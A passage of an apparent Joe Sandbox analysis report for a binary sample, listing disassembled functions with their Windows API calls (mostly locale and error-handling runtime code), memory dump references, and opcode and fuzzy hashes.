                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                            • Opcode ID: 2b83d1c33d24948861b28e7d21184f36d74db822808daf71a3e720e67bceccf3
                                                                                                                                                                                            • Instruction ID: ae98a59576645038fa09e374e265cd9c02b611a5a2b8999c0bc1e9388eeebcd7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b83d1c33d24948861b28e7d21184f36d74db822808daf71a3e720e67bceccf3
                                                                                                                                                                                            • Instruction Fuzzy Hash: C02198F2A60207ABEB189E15DC45ABA73ACEF56314F1400BAFD05D7181E7B4DDA4CB50
                                                                                                                                                                                            Function 0021C2B7 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0021C2C1
                                                                                                                                                                                              • Part of subcall function 0021C272: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0021C316,000000FF,00000000,0021C315,00000000,00000000,?,?,?,?,0021C316,?), ref: 0021C2A8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharH_prolog3_MultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1474283020-0
                                                                                                                                                                                            • Opcode ID: efc4173355e1b9123d87d05a72004fd05870dcfefa6430e4461de022cb495d9c
                                                                                                                                                                                            • Instruction ID: 34d759998a05c1d7466c8220b72391e6bf7a3912a2c5e94d54f37878fc1dda77
                                                                                                                                                                                            • Opcode Fuzzy Hash: efc4173355e1b9123d87d05a72004fd05870dcfefa6430e4461de022cb495d9c
                                                                                                                                                                                            • Instruction Fuzzy Hash: E6219572D6122DA7CB24EBA4CC8ABCD77B8AF10310F5045D1A618A7182DB746FD5CF90
                                                                                                                                                                                            Function 00204B0C Relevance: 1.6, Strings: 1, Instructions: 315COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                            • API String ID: 0-3772416878
                                                                                                                                                                                            • Opcode ID: 1dc17a8e16918fc5b4d92e11e225e9c2090c7f55ee3fa5afe13d2d34ddbb0f15
                                                                                                                                                                                            • Instruction ID: 597b846841f10739795c2d9283cae4926c4977ed20ecb9300ba103739cbae599
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dc17a8e16918fc5b4d92e11e225e9c2090c7f55ee3fa5afe13d2d34ddbb0f15
                                                                                                                                                                                            • Instruction Fuzzy Hash: 43D19E71A1126A9FCB25CF288C407EDFB70AF65300F1481EAD559B7782D6709EA4CFA1
                                                                                                                                                                                            Function 00238EF2 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
                                                                                                                                                                                              • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00239020,00000001,00000000,?,-00000050,?,00239661,00000000,?,?,?,00000055,?), ref: 00238F64
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: ac9be98134973c22707dfc7596dd006a7baaaeb09e6bd3914f6d80ae2b413040
                                                                                                                                                                                            • Instruction ID: 1687b905932992fc1c3a70a7faf242073a9200a1723d8ced378a96cdad2673a5
                                                                                                                                                                                            • Opcode Fuzzy Hash: ac9be98134973c22707dfc7596dd006a7baaaeb09e6bd3914f6d80ae2b413040
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1011297B2203019FDB189F39D89157AB792FF80318F54442DF9468BB40D771B852CB40
                                                                                                                                                                                            Function 002394AF Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
                                                                                                                                                                                              • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0023923C,00000000,00000000,?), ref: 002394DB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                            • Opcode ID: f995d587b6c55d809c5f313051f40c69a4ce2288b1b05db3fc3565370fda5999
                                                                                                                                                                                            • Instruction ID: c78bde540150f2e8b7d494832ba0f9cc992584364be3db6891dec4bcd1b6fe80
                                                                                                                                                                                            • Opcode Fuzzy Hash: f995d587b6c55d809c5f313051f40c69a4ce2288b1b05db3fc3565370fda5999
                                                                                                                                                                                            • Instruction Fuzzy Hash: 82012BB3630113ABDF185E6198066BB3758DB41354F044429FC06A3180EAB0FDE1CA90
                                                                                                                                                                                            Function 00238F8D Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
                                                                                                                                                                                              • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00239280,00000001,00000000,?,-00000050,?,00239629,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00238FD7
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: bc4cccc72025e7f6a6e5cdd1f9f99a9be157d25f5e15d96b6ac83825bfeadd74
                                                                                                                                                                                            • Instruction ID: 7f60e53c3ca83ea6364e248d4c7e932aa72570d8ef62cbe00ce91db156dfc1f4
                                                                                                                                                                                            • Opcode Fuzzy Hash: bc4cccc72025e7f6a6e5cdd1f9f99a9be157d25f5e15d96b6ac83825bfeadd74
                                                                                                                                                                                            • Instruction Fuzzy Hash: B5F046B62203045FCB145F35DC85E7ABB96EF82728F05802DF9498BA90CAB1AC11CB40
                                                                                                                                                                                            Function 00231B7D Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0022E991: EnterCriticalSection.KERNEL32(?,?,0022BDC5,00000000,002577E8,0000000C,0022BD8D,?,?,002302D4,?,?,00231547,00000001,00000364,?), ref: 0022E9A0
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00231B70,00000001,00257AD8,0000000C,00231FA5,00000000), ref: 00231BB5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                                                                            • Opcode ID: 268a19138a722c8a584a9f19cad455c3e9f5249818eb823be22fbf9f26c29461
                                                                                                                                                                                            • Instruction ID: 778523524f6edbd4e2ed1483628de37e5c4c9ac8dc6b42263269d9e20635a286
                                                                                                                                                                                            • Opcode Fuzzy Hash: 268a19138a722c8a584a9f19cad455c3e9f5249818eb823be22fbf9f26c29461
                                                                                                                                                                                            • Instruction Fuzzy Hash: 47F087B2A54304EFDB10DF98E806B8CBBF0FB0A722F00415AF404AB2A1DB7A49108F40
                                                                                                                                                                                            Function 00238EA7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
                                                                                                                                                                                              • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00238E00,00000001,00000000,?,?,00239683,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00238EDE
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                            • Opcode ID: c7f0905c34649ea5197f2e1e497768878b6d7a29a0e813d5d99b757a05d2de6f
                                                                                                                                                                                            • Instruction ID: 6bdb09ddf5a15221569dc7607711c50cb9243cc73709c4a072b427ff12673293
                                                                                                                                                                                            • Opcode Fuzzy Hash: c7f0905c34649ea5197f2e1e497768878b6d7a29a0e813d5d99b757a05d2de6f
                                                                                                                                                                                            • Instruction Fuzzy Hash: FFF02B7A31030657CB159F76D84966ABF94EFC2710F06445DFE09CF691CA72D852C790
                                                                                                                                                                                            Function 002320A9 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0022E467,?,20001004,00000000,00000002,?,?,0022DA59), ref: 002320DD
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                            • Opcode ID: 4e0d53586a74ec713230813688b1b912c6b87d7e612dc30d2eed295db37e73db
                                                                                                                                                                                            • Instruction ID: 5a70d4b856b38e922774cc4ff8646537117ba7609a7fb8d1af148dcb5a19fe54
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e0d53586a74ec713230813688b1b912c6b87d7e612dc30d2eed295db37e73db
                                                                                                                                                                                            • Instruction Fuzzy Hash: CFE04F75511218FBCF122F60EC09EAE7F25EF45750F044011FC0965221CB728E34AA95
                                                                                                                                                                                            Function 0021D535 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001D550,0021D005), ref: 0021D53A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                            • Opcode ID: f32df832ae2045babe11bbb37b7c3080727bcc79f7a2e03c942fbeb1df161b45
                                                                                                                                                                                            • Instruction ID: f1c5abfd0d0e82ac95c3a2e4130267ec287d0c9a9d1bf366c8d941ab14fc6bdc
                                                                                                                                                                                            • Opcode Fuzzy Hash: f32df832ae2045babe11bbb37b7c3080727bcc79f7a2e03c942fbeb1df161b45
                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                            Function 00205462 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: PK
                                                                                                                                                                                            • API String ID: 0-443340723
                                                                                                                                                                                            • Opcode ID: 8d692baa89d95842a0aabdd76eb18694bba47f7ed83faee748b5527ff2f4f7af
                                                                                                                                                                                            • Instruction ID: 9179c74bee2cae6fff87220789eadb18211aabb99c7311bdd5bc6f74c9338a14
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d692baa89d95842a0aabdd76eb18694bba47f7ed83faee748b5527ff2f4f7af
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0991BD31218B42AFD709CF28C840AAAFBA5FF95314F44461DF4A587692C731E964CFD6
                                                                                                                                                                                            Function 002137C6 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: i-8
                                                                                                                                                                                            • API String ID: 0-3871616529
                                                                                                                                                                                            • Opcode ID: e053eb542aeb4a6de5b8424594cc9e7dc13aeb8df60439d1d98f254186d395c6
                                                                                                                                                                                            • Instruction ID: 98a60bcdcffaa6f1e897c96ed21dc477bb7c69fd3c1c167264f917adede8326d
                                                                                                                                                                                            • Opcode Fuzzy Hash: e053eb542aeb4a6de5b8424594cc9e7dc13aeb8df60439d1d98f254186d395c6
                                                                                                                                                                                            • Instruction Fuzzy Hash: D2F096B35111283B5B1CDE65EC5ACBFB79DDB89260706412EFC0AAB180C920AC1085B4
                                                                                                                                                                                            Function 002023C8 Relevance: .5, Instructions: 456COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b89b3425908d80c50b42de7a67ab193db0859acfb694cfdbe637fbe3fa3b06cc
                                                                                                                                                                                            • Instruction ID: e092d349afbb46eed59e08f1d96b797c2929739a89ec0a60578b3da200f40c18
                                                                                                                                                                                            • Opcode Fuzzy Hash: b89b3425908d80c50b42de7a67ab193db0859acfb694cfdbe637fbe3fa3b06cc
                                                                                                                                                                                            • Instruction Fuzzy Hash: B5126774A20B22EFC719CF29C594668FBB4FF49310B60421AD65697B82D335B879CB90
                                                                                                                                                                                            Function 00201A8D Relevance: .5, Instructions: 453COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 22e08377c55ee15222046d1f4e8f94786d6737c3e6351ddfd29771396e6732a1
                                                                                                                                                                                            • Instruction ID: 9ad296330e9c8baa5d4675f924a00d21bb77879919c2ba9c065acc0104d9747a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 22e08377c55ee15222046d1f4e8f94786d6737c3e6351ddfd29771396e6732a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: EE12B130A10B648FDB35CF29C8947EAB7F5BF95300F2448ADD59A57B92D631A9A4CF00
                                                                                                                                                                                            Function 002028E2 Relevance: .4, Instructions: 369COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b8961b9b7fb61cc723bdf3267792ed5758ef175de6f184371cea271f75f84d51
                                                                                                                                                                                            • Instruction ID: 7e1aebec1060c76b286175840336d35bf908181b0b98b0524d5d09fe5ad14419
                                                                                                                                                                                            • Opcode Fuzzy Hash: b8961b9b7fb61cc723bdf3267792ed5758ef175de6f184371cea271f75f84d51
                                                                                                                                                                                            • Instruction Fuzzy Hash: 30F11575E1070ACFCB24CFA9C8846AEBBF1FF48310F24856ED89AE3741D634A9558B54
                                                                                                                                                                                            Function 002386A0 Relevance: .3, Instructions: 342COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                            • Opcode ID: 6e5805fae1e8e41031a2bc05ae872c5f1766339c499eaf842439461290cc2557
                                                                                                                                                                                            • Instruction ID: b84eb3930eb83e743dd663e2311642441da320732c2071e48d986ceb0106614e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e5805fae1e8e41031a2bc05ae872c5f1766339c499eaf842439461290cc2557
